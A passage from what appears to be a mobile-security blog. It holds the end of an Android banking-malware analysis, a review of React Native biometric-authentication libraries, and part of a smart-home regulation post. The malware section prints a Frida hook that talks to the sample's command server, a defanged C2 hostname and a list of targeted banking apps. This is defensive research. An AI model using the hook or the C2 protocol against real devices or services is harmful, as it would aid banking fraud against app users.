    PanelReqClass.Send.overload('java.lang.String', 'java.lang.String').implementation = function(hostname, payload){
      var injects="GET_INJECTS_LIST,alior.banking[...]zebpay.Application,"
      if(payload.split(",")[0] == "GET_INJECTS_LIST"){
          payload=injects
      }
      console.log("hostname:"+hostname);
      console.log("payload:"+payload);
      var retVal = this.Send(hostname, payload);
      console.log("Response:" + retVal)
      console.log("------");
      return retVal;
    }
});

Frida also automatically reloads scripts if it detects a change, so we can simply update the Send hook with new commands to try out and it will automatically be picked up.

Based on the very long list of package names I submitted, the following response was returned by the server to say which packages should be attacked:

-----
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECTS_LIST,alior.banking[...]zebpay.Application
Response:com.bankinter.launcher,com.bbva.bbvacontigo,com.binance.dev,com.cajasur.android,com.coinbase.android,com.grupocajamar.wefferent,com.imaginbank.app,com.kutxabank.android,com.rsi,com.tecnocom.cajalaboral,es.bancosantander.apps,es.cm.android,es.evobanco.bancamovil,es.ibercaja.ibercajaapp,es.liberbank.cajasturapp,es.openbank.mobile,es.pibank.customers,es.univia.unicajamovil,piuk.blockchain.android,www.ingdirect.nativeframe
-----

When the sample receives the list of applications to attack, it immediately begins sending the GET_INJECT command to get a HTML page for each targeted application:

---
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECT,es.evobanco.bancamovil
Response:<!DOCTYPE html>
<html>
<head>
    <title>evo</title>
    <link rel="shortcut icon" href="es.evobanco.bancamovil.png" type="image/png">
    <meta charset="utf-8">
....

In order to view the different overlays, we can modify the Frida script to save the server’s response to an HTML file:

if(payload.split(",")[0] == "GET_INJECT"){
       var file = new File("/data/data/com.tencent.mobileqq/"+payload.split(",")[1] + ".html","w");
       file.write(retVal);
       file.close();
}

We can then extract them from the device, open them in Chrome, take some screenshots and end up with a nice collage:

Conclusion

The sample we examined in this post is pretty basic. The initial dropper made it a little bit difficult, but since the decrypted payload was never removed from the application folder, it was easy to extract and analyze. The actual payload uses a bit of string obfuscation but is very easy to understand.

The communication with the C&C is encrypted, and by hooking the correct method with Frida we don’t even have to figure out how the encryption works. If you want to know how it works though, be sure to check out the technical writeups by ProDaft (pdf) and Aleksejs Kuprins.

Jeroen Beckers
Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

A closer look at the security of React Native biometric libraries

6 April 2021 at 09:43

Many applications require the user to authenticate inside the application before they can access any content. Depending on the sensitivity of the information contained within, applications usually have two approaches:

  • The user authenticates once, then stays authenticated until they manually log out;
  • The user does not stay logged in for too long and has to re-authenticate after a period of inactivity.

The first strategy, while very convenient for the user, is obviously not very secure. The second approach is pretty secure but is a burden for the users as they have to enter their credentials every time. Implementing biometric authentication reduces this burden as the authentication method becomes quite easy and fast for the user.

Developers typically don’t write these integrations with the OS from scratch, and will typically use libraries either provided by the framework or by a third-party. This is especially true when working with cross-platform mobile application framework such as Flutter, Xamarin or React Native, where such integration needs to be implemented in the platform specific code. As authentication is a security-critical feature, it is important to verify if those third-party libraries have securely implemented the required functionality.

In this blog post, we will first take a look at the basic concept of biometric authentication, so that we can then investigate the security of several React Native libraries that provide support for biometric authentication.

TLDR;

We analyzed five React Native libraries that provide biometric authentication. For each of these libraries, we analyzed how the biometric authentication is implemented and whether it correctly uses the cryptographic primitives provided by the OS to secure sensitive data.

Our analysis showed that only one of the five analyzed libraries provides a secure result-based biometric authentication. The other libraries only offer event-based authentication, which is insecure as the biometric authentication is only validated without actually protecting any data in a cryptographic fashion.

The table below provides a summary of the type of biometric authentication offered by each analyzed library:

Library Event-based* Result-based*
react-native-touch-id
expo-local-authentication
react-native-fingerprint-scanner
react-native-fingerprint-android
react-native-biometrics
* See below for definitions

Biometric authentication

Biometric authentication allows the user to authenticate to an application using their biometric data (fingerprint or face recognition). In general, biometric authentication can be implemented in two different ways:

  • Event-based: the biometric API simply returns the result of the authentication attempt to the application (“Success” or “Failure”). This method is considered insecure;
  • Result-based: upon a successful authentication, the biometric API retrieves some cryptographic object (such as a decryption key) and returns it to the application. Upon failure, no cryptographic object is returned.

Event-based authentication is insecure as it only consists of boolean value (or similar) being returned. It can therefore be bypassed using code instrumentation (e.g. Frida) by modifying the return value or by manually triggering the success flow. If an implementation is event-based, it also means that sensitive information is stored somewhere in an insecure fashion: After the application has received “success” from the biometric API, it will still need to authenticate the user to the back-end using some kind of credentials, which will be retrieved from local storage. This will be done without the need of a decryption key (otherwise the implementation wouldn’t be event-based) which means the credentials are stored somewhere on local storage without proper encryption.

A well-implemented result-based biometric authentication, on the other hand, will not be bypassable with tools such as Frida. To implement a secure result-based biometric authentication, the application must use hardware-backed biometric APIs.

A small note about storing credentials

While we use the term “credentials” in this blog post, we are not advocating for the storage of the user’s credentials (i.e. username and password). Storing the user’s credentials on the device is never a good idea for high-security applications, regardless of the way they are stored. Instead, the “credentials” mentioned above should be credentials dedicated to the biometric authentication (such as a high entropy string), which are generated during the activation of the biometric authentication.

To implement a secure result-based biometric authentication on Android, a cryptographic key requiring user authentication must be generated. This can be achieved by using the setUserAuthenticationRequired method when generating the key. Whenever the application will try to access the key, Android will ensure that valid biometrics are provided. The key must then be used to perform a cryptographic operation that unlocks credentials that can then be sent to the back-end. This is done by supplying a CryptoObject, initiated with the previous key, to the biometric API. For example, the BiometricPrompt class provides an authenticate method which takes a CryptoObject as an argument. A reference to the key can then be obtained in the success callback method, through the result argument. More information on implementing secure biometric authentication on Android can be found in this very nice blogpost by f-secure.

On iOS, a cryptographic key must be generated and stored in the Keychain. The entry in the Keychain must be set with the access control flag biometryAny. The key must then be used to perform cryptographic operation that unlocks credentials that can be sent to the back-end. By querying the Keychain for a key protected by biometryAny, iOS will make sure that the user unlocks the required key using their biometric data. Alternatively, instead of storing the cryptographic key in the Keychain, we could directly store the credentials themselves with the biometryAny protection.

Being even more secure with fingerprints

Android and iOS allow you to either trust ‘all fingerprints enrolled on the device’, or ‘all fingerprints currently enrolled on the device’. In the latter case, the cryptographic object becomes unusable in case a fingerprint is added or removed.
For Android, the default is ‘all fingerprints’, while you can use setInvalidatedByBiometricEnrollment to delete a CryptoObject in case a fingerprint is added to the device.
For iOS, the choice is between biometryAny and biometryCurrentSet.
While the ‘currently enrolled‘ option is the most secure, we will not put any weight on this distinction in this blogpost.

Is event-based authentication really insecure?

Yes and no. This fully depends on the threat model of your mobile application. The requirement for applications to provide result-based authentication is a Level 2 requirement in the OWASP MASVS (MSTG-AUTH-8). Level 2 means that your application is handling sensitive information and is typically used for applications in the financial, medical or government sector.

OWASP MASVS Verification Levels (source)

If your application uses event-based biometric authentication, there are specific attacks that will make the user’s credentials available to the attacker:

  • Physical extraction using forensics software
  • Extraction of data from backup files (e.g. iTunes backups or adb backups)
  • Malware with root access to the device

This last example would also be able to attack an application that uses result-based biometric authentication, as it would be possible to inject into the application right after the credentials have been decrypted in memory, but the bar for such an attack is much higher than simply copying the application’s local storage.

React Native

React Native is an open-source mobile application framework created by Facebook. The framework, built on top of ReactJS, allows for cross-platform mobile application development in JavaScript. This allows developer to develop mobile applications on different platforms at once, using HTML, CSS and JavaScript. Over the past few years it has gained quite some traction and is now used by many developers.

While being a cross-platform framework, some feature still require developing in native Android (Java or Kotlin) or iOS (Objective-C or Swift). To get rid of that need, many libraries have seen the light of the day to take care of the platform specific code and provide a JavaScript API that can be used directly in React Native.

Biometric authentication is one such feature that still requires platform specific code to be implemented. It is therefore no surprise that many libraries have been created in an attempt to spare developers the burden of having to implement them separately on the different platforms.

A closer look at several React Native biometric authentication libraries

In this section, we will take a look at five libraries that provide biometric authentication for React Native applications. Rather than only focusing on the documentation, we will examine the source code to verify if the implementation is secure. Based on the top results on Google for ‘biometric API react native’ we have chosen the following libraries:

For each library, we have linked to the specific commit that was the latest while writing this blogpost. Please use the latest versions of the libraries in case you want to use them.

React-native-touch-id

GitHub: https://github.com/naoufal/react-native-touch-id/ (Reviewed version)

Library no longer maintained

The library is no longer maintained by its developers and should therefore not be used anymore regardless of the conclusions of our analysis.

In the Readme file, we can already find some hints that the library does not support result-based biometric authentication. The example code given in the documentation contains the following lines of code:

TouchID.authenticate('to demo this react-native component', optionalConfigObject)
    .then(success => {
        AlertIOS.alert('Authenticated Successfully');
    })
    .catch(error => {
        AlertIOS.alert('Authentication Failed');
    });

In the above example, it is clear that it is an event-based biometric authentication as the success method does not verify the state of the authentication, nor does it provide a way for the developers to verify it.

The more astute among you will notice the optionalConfigObject parameter, which could very well contain data that would be used in a result-based authentication, right? Unfortunately, that’s not the case. If we look a bit further in the documentation, we will find the following:

authenticate(reason, config)
Attempts to authenticate with Face ID/Touch ID. Returns a Promise object.
Arguments
    - reason - An optional String that provides a clear reason for requesting authentication.
    - config - optional - Android only (does nothing on iOS) - an object that specifies the title and color to present in the confirmation dialog.

As we can see, the authenticate method only takes the two parameters that were used in the example. In addition, the optional parameter config (optionalConfigObject in the example code), which does nothing on iOS, is used for UI information.

Ok, enough with the documentation, let’s now dive into the source code to see if the library provides a way to perform a result-based biometric authentication.

Android

Let’s first take a look at the Android implementation. We can find the React Native authenticate method in the TouchID.android.js file, which is used to perform the biometric authentication. This method is the only method to perform biometric authentication provided by the library. The following code can be found in the method:

authenticate(reason, config) {
  //...
  return new Promise((resolve, reject) => {
    NativeTouchID.authenticate(
      authReason,
      authConfig,
      error => {
        return reject(typeof error == 'String' ? createError(error, error) : createError(error));
      },
      success => {
        return resolve(true);
      }
    );
  });
}

We can already see in the above code snippet that the success callback does not verify the result of the authentication and only returns a boolean value. The Android implementation is therefore event-based.

iOS

Let’s now take look at the iOS implementation. Once again, the TouchID.ios.js file only contains one method for biometric authentication, authenticate, which contains the following code:

authenticate(reason, config) {
  //...
  return new Promise((resolve, reject) => {
    NativeTouchID.authenticate(authReason, authConfig, error => {
      // Return error if rejected
      if (error) {
        return reject(createError(authConfig, error.message));
      }

      resolve(true);
    });
  });
}

As we can see, authentication will fail if the error object is set, and will return a boolean value if not. The library does not provide a way for the application to verify the state of the authentication. The iOS implementation is therefore event-based.

As we saw, react-native-touch-id only supports event-based biometric authentication. Applications using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

Expo-local-authentication

GitHub: https://github.com/expo/expo (Reviewed version)

The library only provides one JavaScript method for biometric authentication, authenticateAsync, which can be found in the LocalAuthentication.ts file. The following code is responsible for the biometric authentication:

export async function authenticateAsync(
    options: LocalAuthenticationOptions = {}
): Promise<LocalAuthenticationResult> {
    //...
    const promptMessage = options.promptMessage || 'Authenticate';
    const result = await ExpoLocalAuthentication.authenticateAsync({ ...options, promptMessage });

    if (result.warning) {
        console.warn(result.warning);
    }
    return result;
}

The method performs a call to the native ExpoLocalAuthentication.authenticateAsync method and returns the resulting object. To see which data is included in the result object, we will have to dive into the platform specific part of the library.

Android

The authenticateAsync method called from JavaScript can be found in the LocalAuthenticationModule.java file. The following code snippet is the part that we are interested in:

public void authenticateAsync(final Map<String, Object> options, final Promise promise) {
  
      //...
      Executor executor = Executors.newSingleThreadExecutor();
      mBiometricPrompt = new BiometricPrompt(fragmentActivity, executor, mAuthenticationCallback);

      BiometricPrompt.PromptInfo.Builder promptInfoBuilder = new BiometricPrompt.PromptInfo.Builder()
              .setDeviceCredentialAllowed(!disableDeviceFallback)
              .setTitle(promptMessage);
      if (cancelLabel != null && disableDeviceFallback) {
        promptInfoBuilder.setNegativeButtonText(cancelLabel);
      }
      BiometricPrompt.PromptInfo promptInfo = promptInfoBuilder.build();
      mBiometricPrompt.authenticate(promptInfo);
    }
  });
}

Right away, we can see that the call to BiometricPrompt.authenticate is performed without supplying a BiometricPrompt.CryptoObject. The biometric authentication can therefore only be event-based rather than result-based. For the sake of completeness, let’s verify this assertion by looking at the success callback method:

new BiometricPrompt.AuthenticationCallback () {
  @Override
  public void onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult result) {
    mIsAuthenticating = false;
    mBiometricPrompt = null;
    Bundle successResult = new Bundle();
    successResult.putBoolean("success", true);
    safeResolve(successResult);
  }
};

As expected, the onAuthenticationSucceeded callback method does not verify the value of result and returns a boolean value, which shows that the Android implementation is event-based.

iOS

Let’s now look at the iOS implementation.

The authenticateAsync method called from JavaScript can be found in the EXLocalAuthentication.m file. The following code snippet is the part that we are interested in:

UM_EXPORT_METHOD_AS(authenticateAsync,
                    authenticateWithOptions:(NSDictionary *)options
                    resolve:(UMPromiseResolveBlock)resolve
                    reject:(UMPromiseRejectBlock)reject)
{
    //...
    [context evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics
      localizedReason:reason
        reply:^(BOOL success, NSError *error) {
          resolve(@{
            @"success": @(success),
            @"error": error == nil ? [NSNull null] : [self convertErrorCode:error],
            @"warning": UMNullIfNil(warningMessage),
          });
        }];
}

Just like the Android implementation, the library returns a boolean value indicating whether the authentication succeeded or not. The iOS implementation is therefore event-based.

It is worth noting that the library allows for other authentication methods to be used on iOS (device PIN code, Apple Watch, …). Unfortunately, the implementation of the authentication for the other methods suffers from the same issue as the biometric authentication as can be seen in the following code snippet:

UM_EXPORT_METHOD_AS(authenticateAsync,
                    authenticateWithOptions:(NSDictionary *)options
                    resolve:(UMPromiseResolveBlock)resolve
                    reject:(UMPromiseRejectBlock)reject)
{
  NSString *disableDeviceFallback = options[@"disableDeviceFallback"];
  //...
  if ([disableDeviceFallback boolValue]) {
    // biometric authentication
  } else {
    [context evaluatePolicy:LAPolicyDeviceOwnerAuthentication
      localizedReason:reason
        reply:^(BOOL success, NSError *error) {
          resolve(@{
            @"success": @(success),
            @"error": error == nil ? [NSNull null] : [self convertErrorCode:error],
            @"warning": UMNullIfNil(warningMessage),
          });
        }];
  }
}

As we just saw, the expo-local-authentication library only supports event-based biometric authentication. Developer using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

React-native-fingerprint-scanner

Source: https://github.com/hieuvp/react-native-fingerprint-scanner (Reviewed version)

The library provides two different implementations for the two platforms. Let’s start with Android.

Android

The library provides one JavaScript method to authenticate using biometric, authenticate, that can be found in the authenticate.android.js file. On Android 6.0 and above, the authenticate method will be the following:

const authCurrent = (title, subTitle, description, cancelButton, resolve, reject) => {
  ReactNativeFingerprintScanner.authenticate(title, subTitle, description, cancelButton)
    .then(() => {
      resolve(true);
    })
    .catch((error) => {
      reject(createError(error.code, error.message));
    });
}

On Android versions before Android 6.0, the authenticate method will be the following:

const authLegacy = (onAttempt, resolve, reject) => {
  //...
  ReactNativeFingerprintScanner.authenticate()
    .then(() => {
      DeviceEventEmitter.removeAllListeners('FINGERPRINT_SCANNER_AUTHENTICATION');
      resolve(true);
    })
    .catch((error) => {
      DeviceEventEmitter.removeAllListeners('FINGERPRINT_SCANNER_AUTHENTICATION');
      reject(createError(error.code, error.message));
    });
}

In both cases, the method will return a boolean value if the call to ReactNativeFingerprintScanner.authenticate did not throw an error, and will raise an exception otherwise. The Android implementation is therefore event-based.

iOS

Just like Android, the library provides one JavaScript method to authenticate using biometric: authenticate. The implementation of the method can be found in the authenticate.ios.js file and can also be found in the following code snippet:

export default ({ description = ' ', fallbackEnabled = true }) => {
  return new Promise((resolve, reject) => {
    ReactNativeFingerprintScanner.authenticate(description, fallbackEnabled, error => {
      if (error) {
        return reject(createError(error.code, error.message))
      }

      return resolve(true);
    });
  });
}

Once again, the method will return a boolean value if the call to ReactNativeFingerprintScanner.authenticate did not return an error. The iOS implementation is therefore event-based.

Similarly to expo-local-authentication, react-native-fingerprint-scanner also supports other authentication methods on iOS. These can be used as fallback methods if the fallbackEnabled parameter is set to true when calling the authenticate method, which is the case by default. As the authenticate method is used for these fallback methods as well, they also suffer from the same issue as the biometric authentication provided by the library.

As we just saw, the react-native-fingerprint-scanner library only supports event-based biometric authentication. Developer using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

React-native-fingerprint-android

GitHub: https://github.com/jariz/react-native-fingerprint-android (Reviewed version)

As the name of the library suggests, the library only implements biometric authentication on the Android platform.

The library provides one method for biometric authentication, authenticate, which can be found in the index.android.js file. The part that we are interested in is the following:

static async authenticate(warningCallback:?(response:FingerprintError) => {}):Promise<null> {
  //..
  let err;
  try {
    await FingerprintAndroidNative.authenticate();
  } catch(ex) {
    err = ex
  }
  finally {
    //remove the subscriptions and crash if needed
    DeviceEventEmitter.removeAllListeners("fingerPrintAuthenticationHelp");
    if(err) {
      throw err
    }
  }
}

Right away, we can see in the method prototype that the method returns a Promise<null>. This is similar to returning a boolean value, indicating therefore that the biometric authentication provided by the library is event-based.

However, let’s still dive into the Java implementation of FingerprintAndroidNative.authenticate just to be sure.

The implementation of the method can be found in the FingerprintModule.java file. The relevant lines of the method can be found below:

public void authenticate(Promise promise) {
    //...
    fingerprintManager.authenticate(null, 0, cancellationSignal, new AuthenticationCallback(promise), null); 
    //..
}

As we can see, the method performs a call to the FingerprintManager.authenticate method without providing a FingerprintManager.CryptoObject. The biometric authentication can therefore only be event-based rather than result-based. We could convince ourselves even further by inspecting the OnAuthenticationSucceeded callback method, but this should be enough already.

As we just saw, the react-native-fingerprint-android library only supports event-based biometric authentication. Developer using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

React-native-biometrics

GitHub: https://github.com/SelfLender/react-native-biometrics (Reviewed version)

Last, but certainly not least! The library provides two methods to authenticate using biometrics. This looks promising already!

The first method to perform biometric authentication is the simplePrompt method, available in the index.ts file. However, it is clearly mentioned in the documentation that this method only validates the user’s biometrics and that it should not be used for security sensitive features:

simplePrompt(options)
Prompts the user for their fingerprint or face id. Returns a Promise that resolves if the user provides a valid biometrics or cancel the prompt, otherwise the promise rejects.

**NOTE: This only validates a user's biometrics. This should not be used to log a user in or authenticate with a server, instead use createSignature. It should only be used to gate certain user actions within an app.

We will therefore not investigate this method as it should already be clear to the reader that it is an event-based biometric authentication.

The second method to perform biometric authentication in the library is the createSignature method, available in the index.ts file. According to the documentation, to use this method, a key pair must first be created, using the createKeys method, and the public key must be sent to the server. The authentication process consists in a cryptographic signature sent and verified on the server. The diagram below, taken from the Readme file, illustrates this process.

https://camo.githubusercontent.com/8558a1a8617482d43d4ea3fc6d872adcc6c2c42644cdfef994b4ac3b2790907b/68747470733a2f2f322e62702e626c6f6773706f742e636f6d2f2d4c70327a61415a696574772f566935396862366b3653492f4141414141414141424c6b2f48735858425969497771552f73313630302f696d61676530312e706e67
Authentication flow (source)

Alright! On paper, this looks pretty secure: a cryptographic signature being verified on the server is a proper way to perform biometric authentication. However, we still need to verify if the cryptographic operations are done properly in the library.

Let’s analyze the platform specific implementations.

Android

To verify that the library uses a secure implementation, we have to verify that:

  • The private key used to perform the signature requires user authentication;
  • The success callback uses the result of the biometric authentication to perform cryptographic operations;
  • The library returns the result of the above cryptographic operations to the application.

So first, let’s analyze the createSignature method from the ReactNativeBiometrics class:

public void createSignature(final ReadableMap params, final Promise promise) {
    //...
    Signature signature = Signature.getInstance("SHA256withRSA");
    KeyStore keyStore = KeyStore.getInstance("AndroidKeyStore");
    keyStore.load(null);

    PrivateKey privateKey = (PrivateKey) keyStore.getKey(biometricKeyAlias, null);
    signature.initSign(privateKey);

    BiometricPrompt.CryptoObject cryptoObject = new BiometricPrompt.CryptoObject(signature);

    AuthenticationCallback authCallback = new CreateSignatureCallback(promise, payload);
    //...
    BiometricPrompt biometricPrompt = new BiometricPrompt(fragmentActivity, executor, authCallback);

    PromptInfo promptInfo = new PromptInfo.Builder()
            .setDeviceCredentialAllowed(false)
            .setNegativeButtonText(cancelButtomText)
            .setTitle(promptMessage)
            .build();
    biometricPrompt.authenticate(promptInfo, cryptoObject);
}

In the above code, we can see that a Signature object is initiated with the private key biometricKeyAlias. A CryptoObject is then initiated with the signature. Finally, we can see that the CryptoObject is correctly given to the BiometricPrompt.authenticate method. Ok, so far so good.

Let’s now take a look at how the used key pair is created:

public void createKeys(Promise promise) {
    //...  
    KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_RSA, "AndroidKeyStore");
    KeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(biometricKeyAlias, KeyProperties.PURPOSE_SIGN)
            .setDigests(KeyProperties.DIGEST_SHA256)
            .setSignaturePaddings(KeyProperties.SIGNATURE_PADDING_RSA_PKCS1)
            .setAlgorithmParameterSpec(new RSAKeyGenParameterSpec(2048, RSAKeyGenParameterSpec.F4))
            .setUserAuthenticationRequired(true)
            .build();
    keyPairGenerator.initialize(keyGenParameterSpec);
    //...
}

We can see in the code snippet above that the AndroidKeystore is used and that the key pair is configured to require user authentication using the setUserAuthenticationRequired method.

We now only need to verify that the success callback properly handles and returns the result of the authentication. Let’s take a look at the onAuthenticationSucceeded method of the CreateSignatureCallback class:

public void onAuthenticationSucceeded(@NonNull BiometricPrompt.AuthenticationResult result) {
    //...
    BiometricPrompt.CryptoObject cryptoObject = result.getCryptoObject();
    Signature cryptoSignature = cryptoObject.getSignature();
    cryptoSignature.update(this.payload.getBytes());
    byte[] signed = cryptoSignature.sign();
    String signedString = Base64.encodeToString(signed, Base64.DEFAULT);
    signedString = signedString.replaceAll("\r", "").replaceAll("\n", "");

    WritableMap resultMap = new WritableNativeMap();
    resultMap.putBoolean("success", true);
    resultMap.putString("signature", signedString);
    promise.resolve(resultMap);
    //... 
}

The success callback uses the authentication result to get the Signature object and to sign the provided payload. The signature is then encoded in base64 and returned in the promise.

The application can therefore provide a payload to the library, which will be signed after the user successfully provided their biometric data. The signature is then returned to the application, which can finally be sent to the server for verification and complete the authentication.

The Android implementation therefore allows for a secure result-based biometric authentication.

iOS

Like for Android, to verify that the library uses a secure implementation, we have to verify that:

  • The private key requires user authentication;
  • The private key is used to perform cryptographic operations;
  • The library returns the result of the above cryptographic operations to the application.

So, let’s dive right in. The following code snippet shows the relevant part of the createSignature method, available in the ReactNativeBiometrics.m file:

RCT_EXPORT_METHOD(createSignature: (NSDictionary *)params resolver:(RCTPromiseResolveBlock)resolve rejecter:(RCTPromiseRejectBlock)reject) {
    //...
    NSData *biometricKeyTag = [self getBiometricKeyTag];
    NSDictionary *query = @{
                            (id)kSecClass: (id)kSecClassKey,
                            (id)kSecAttrApplicationTag: biometricKeyTag,
                            (id)kSecAttrKeyType: (id)kSecAttrKeyTypeRSA,
                            (id)kSecReturnRef: @YES,
                            (id)kSecUseOperationPrompt: promptMessage
                            };
    SecKeyRef privateKey;
    OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, (CFTypeRef *)&privateKey);

    if (status == errSecSuccess) {
      NSError *error;
      NSData *dataToSign = [payload dataUsingEncoding:NSUTF8StringEncoding];
      NSData *signature = CFBridgingRelease(SecKeyCreateSignature(privateKey, kSecKeyAlgorithmRSASignatureMessagePKCS1v15SHA256, (CFDataRef)dataToSign, (void *)&error));

      if (signature != nil) {
        NSString *signatureString = [signature base64EncodedStringWithOptions:0];
        NSDictionary *result = @{
          @"success": @(YES),
          @"signature": signatureString
        };
        resolve(result);
      }
      //...
    }
}

The library attempts to retrieve the private key, identified by biometricKeyTag, from the Keychain and then uses it to sign a provided payload. When the signature succeeds, the library returns the encrypted data to the application. This looks very good already!

Let’s now take a look at how the private key is generated, to ensure that proper user authentication is needed to access it. The key pair is created in the createKeys method, in the same file. The following code snippet show the relevant part of the method:

RCT_EXPORT_METHOD(createKeys: (RCTPromiseResolveBlock)resolve rejecter:(RCTPromiseRejectBlock)reject) {
    //...
    SecAccessControlRef sacObject = SecAccessControlCreateWithFlags(kCFAllocatorDefault,
                                                                    kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
                                                                    kSecAccessControlBiometryAny, &error);
    //...
    NSDictionary *keyAttributes = @{
        (id)kSecClass: (id)kSecClassKey,
        (id)kSecAttrKeyType: (id)kSecAttrKeyTypeRSA,
        (id)kSecAttrKeySizeInBits: @2048,
        (id)kSecPrivateKeyAttrs: @{
        (id)kSecAttrIsPermanent: @YES,
        (id)kSecUseAuthenticationUI: (id)kSecUseAuthenticationUIAllow,
        (id)kSecAttrApplicationTag: biometricKeyTag,
        (id)kSecAttrAccessControl: (__bridge_transfer id)sacObject
        }
    };
    //...
    id privateKey = CFBridgingRelease(SecKeyCreateRandomKey((__bridge CFDictionaryRef)keyAttributes, (void *)&gen_error));
    //...
}

In the above code snippet, we can see that the key pair is generated and added to the Keychain using the kSecAccessControlBiometryAny access control flag. Retrieving the key from the Keychain will therefore require a successful biometric authentication.

The application can therefore provide a payload to the library, which will be signed after the user successfully authenticated. The signature is then returned to the application, which can then be submitted to the server for verification.

The iOS implementation therefore allows for a secure result-based biometric authentication.

As we saw, the react-native-biometrics library provides two biometric authentication methods, one of which, createSignature, offers a secure result-based biometric authentication.

It should be noted that the way the library perform biometric authentication requires the server to implement the signature verification, which is harder and requires more changes on the server than just decrypting a token on the local device and sending it to the server for verification. However, while it is a bit harder to integrate into an application, it has the advantage of preventing replay attacks as the authentication payload sent to the server will be different for every authentication.

Result: Secure result-based authentication

Conclusion

Out of the five libraries we analyzed, only one of them, react-native-biometrics, provides a secure result-based biometric authentication which allows for a non-bypassable authentication implementation. The other four libraries only provide event-based biometric authentication, which only allows for a client-side authentication implementation which would therefore be bypassable.

The table below provides a summary of the type of biometric authentication offered by each analyzed library:

Library Event-based Result-based
react-native-touch-id
expo-local-authentication
react-native-fingerprint-scanner
react-native-fingerprint-android
react-native-biometrics

Usage of third party libraries and mobile development frameworks can certainly decrease the needed development effort, and for applications that don’t require a high level of security, there’s not too much that can go wrong. However, if your application does contain sensitive data or functionality, such as applications from the financial, government or healthcare sector, security should be included in each step of the SDLC. In that case, choosing the correct mobile development framework to use (if any) and which external libraries to trust (if any) is a very important step.

About the authors

Simon Lardinois
Simon Lardinois

Simon Lardinois is a Security Consultant in the Software and Security assessment team at NVISO. His main area of focus is mobile application security, but is also interested in web and reverse engineering. In addition to mobile applications security, he also enjoys developing mobile applications.

Jeroen Beckers
Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

Smart Home Devices: assets or liabilities? – Part 3: Looking at the future

29 March 2021 at 12:54

This blog post is the last part of a series, if you are interested in the security or privacy of smart home devices, be sure to check out the other parts as well!

TL;DR: In our previous blog posts we concluded that there is quite a long way to go for both security and privacy of smart home environments. In this one, we will take a look at what the future might bring for these devices.

Introduction

After taking a close look at a series of smart home devices and assessing how well they held up to the expectations of the buyer when it comes to security and privacy, we will propose a few solutions to help the industry move forward and the consumer to make the right decision when buying a new device.

A recap

To freshen up your memory, we’ll quickly go over the key takeaways of our previous blog posts. If you haven’t read them yet, feel free to check out the parts about security and privacy of smart home environments as well!

Security

When it came to security, many of the devices we tested swung one of two ways: either security had played a major role in the manufacturing process and the device performed well across the board, or the manufacturer didn’t give a hoot about security and the device was lacking any kind of security measures altogether. This means that buying one of these devices is a pretty big hit or miss, especially for the less tech-savvy consumer.

To overcome this issue, consumer guidance is needed in some form or another to steer the buyer towards the devices that offer at least a baseline of security measures a consumer could reasonably expect of a device that they will eventually install into their household.

Privacy

Many devices often didn’t perform much better when looking at privacy. Just like with security, there is a massive gap in maturity between manufacturers that put in an effort to be GDPR compliant and those that didn’t. Luckily the industry has undergone a major shift in mentality which means that most companies at least showed a lot more goodwill towards the people whose data they are collecting. Nevertheless, the need for stronger enforcement and more transparency around fines and sanctions became very clear from my results.

How can we regulate?

Regulating the market can be done in many ways, but for this blog post, we’ll be taking a look at two of them that have historically also been used for other products: in the form of binding standards and certifications, or as voluntary quality labels. Each of these has their own advantages and disadvantages.

Standardisation & Certification

The security industry is rife with standards: there is ISO/IEC 27001 to ensure organisations and their services adhere to the proper security practices; for secure development, there are standards such as the OWASP SAMM and DSOMM; when it comes to security assessments of specific services or devices, standards such as OWASP’s ASVS and MASVS come to mind. For IoT devices, this is no different: OWASP’s ISVS (IoT Security Verification Standard) offers a standardised, controlled methodology to test the security of IoT devices. And these are just the tip of the iceberg: there are a massive number of resources that can be used, as is reflected in this graph. The fact that so many standards exist, reflects the need for specialised industry-specific guidance: a “one-size-fits-all” solution may not exist.

Standards
Did anyone mention standards?
(Image source: XKCD, used under CC BY-NC 2.5)

Mandatory quality requirements and certification to certain standards is nothing new if we take a look at other markets. Take the food industry for example, where rigorous requirements ensure that the meals we put on our table at the end of the day won’t make us sick. But even when we look closer to the smart home devices market, we see that mandatory labels already exist in some form: the CE label is a safety standard that ensures the consumer goods we purchase in the store won’t malfunction and injure us, or the FCC label, that ensures they won’t cause any interference with other radio-controlled devices in the area. Whereas these safety-focused labels and standards are all commonplace and seen as a given, the concept of a binding cyber security baseline for such smart devices is a relatively new one and is not nearly as easily implemented.

The EU’s Cybersecurity Act (CSA) that was introduced in April 2019 gives the European Union Agency for Cybersecurity (ENISA) a new mandate to build out exactly such certification schemes. In response to this, they have published their first certification scheme candidate, the so-called EUCC, in July 2020. Even closer to home, here in Belgium the legal groundwork is also being laid for a Belgian National Cybersecurity Certification Authority, including provisions to accommodate the EU Common Criteria, Cloud Security and 5G certification schemes.

Taking a look overseas, the USA’s “Internet of Things Cybersecurity Improvement Act of 2020” shows us that the need for a stricter regulation of IoT devices not only occurs here in Europe. This newly passed law is based on NIST’s Internal Report 8259 “Foundational Cybersecurity Activities for IoT Device Manufacturers“, and you guessed it – it calls for the creation of IoT security standards and guidelines that the US government will adhere to, in the hope that industry will follow suit.

Quality Labels

